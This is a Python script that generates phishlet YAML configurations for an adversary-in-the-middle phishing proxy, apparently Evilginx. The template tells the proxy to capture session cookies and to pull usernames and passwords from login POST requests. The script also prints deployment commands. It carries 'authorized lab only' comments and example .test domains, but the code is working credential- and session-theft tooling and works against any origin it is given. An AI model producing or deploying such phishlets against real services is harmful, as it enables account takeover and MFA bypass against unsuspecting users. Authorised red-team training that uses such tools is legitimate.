#!/usr/bin/env python3
"""make_phishlet.py — authoring kit: generate a lab phishlet YAML with validation.
Pro-feature #6 offline alternative (authoring workflow, no community DB).

Usage:
  python3 make_phishlet.py --name mylab --phish-domain lab.example.test \
      --phish-sub www --orig-host portal.origin.test \
      --login-path /login --cookie LABSESS [--out dir] [--cookie-domain auto]

Generated phishlet targets ONLY an origin you control (test/lab origin).
"""
import argparse
import re
import sys

TEMPLATE = """# {name}.yaml — generated by make_phishlet.py (authoring kit)
# Authorized-lab use only: origin must be a system you own/control.
min_ver: '3.0.0'
proxy_hosts:
  - {{phish_sub: '{phish_sub}', orig_sub: '{orig_sub}', domain: '{orig_domain}', session: true, is_landing: true, auto_filter: true}}
sub_filters: []
auth_tokens:
  - domain: '{cookie_domain}'
    keys: [{cookie_keys}]
credentials:
  username:
    key: '{user_key}'
    search: '(.*)'
    type: 'post'
  password:
    key: '{pass_key}'
    search: '(.*)'
    type: 'post'
login:
  domain: '{orig_host}'
  path: '{login_path}'
"""


def lint(text, name):
    problems = []
    if "query_map" in text or "drop" in text:
        pass  # optional keys allowed
    for key in ("proxy_hosts:", "auth_tokens:", "credentials:", "login:"):
        if key not in text:
            problems.append(f"missing section {key}")
    if not re.search(r"domain:\s*'", text):
        problems.append("missing domain value")
    return problems


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--name", required=True)
    ap.add_argument("--phish-domain", required=True, help="base phishing domain (must match `config domain`)")
    ap.add_argument("--phish-sub", default="www")
    ap.add_argument("--orig-host", required=True, help="full origin host, e.g. portal.origin.test")
    ap.add_argument("--orig-sub", default=None, help="default: first label of orig-host")
    ap.add_argument("--orig-domain", default=None, help="default: last two labels of orig-host")
    ap.add_argument("--login-path", default="/login")
    ap.add_argument("--cookie", default="SESSION", help="session cookie name(s), comma-separated")
    ap.add_argument("--user-key", default="username")
    ap.add_argument("--pass-key", default="password")
    ap.add_argument("--out", default=".")
    args = ap.parse_args()

    labels = args.orig_host.split(".")
    orig_sub = args.orig_sub or (labels[0] if len(labels) > 2 else "")
    orig_domain = args.orig_domain or ".".join(labels[-2:])
    cookie_domain = args.orig_host  # host-only cookies (see gotcha in LAB docs)
    cookie_keys = ", ".join("'%s'" % c.strip() for c in args.cookie.split(",") if c.strip())

    text = TEMPLATE.format(name=args.name, phish_sub=args.phish_sub, orig_sub=orig_sub,
                           orig_domain=orig_domain, cookie_domain=cookie_domain,
                           cookie_keys=cookie_keys, user_key=args.user_key,
                           pass_key=args.pass_key, orig_host=args.orig_host,
                           login_path=args.login_path)

    problems = lint(text, args.name)
    if problems:
        for p in problems:
            print("[lint] " + p, file=sys.stderr)
        sys.exit(1)

    out = f"{args.out.rstrip('/')}/{args.name}.yaml"
    with open(out, "w") as f:
        f.write(text)
    print(f"[+] wrote {out}")
    print("[i] phish hostname will be: %s.%s" % (args.phish_sub, args.phish_domain))
    print("[i] deploy: copy to phishlets dir, then: phishlets hostname %s %s && phishlets enable %s"
          % (args.name, args.phish_domain, args.name))


if __name__ == "__main__":
    main()
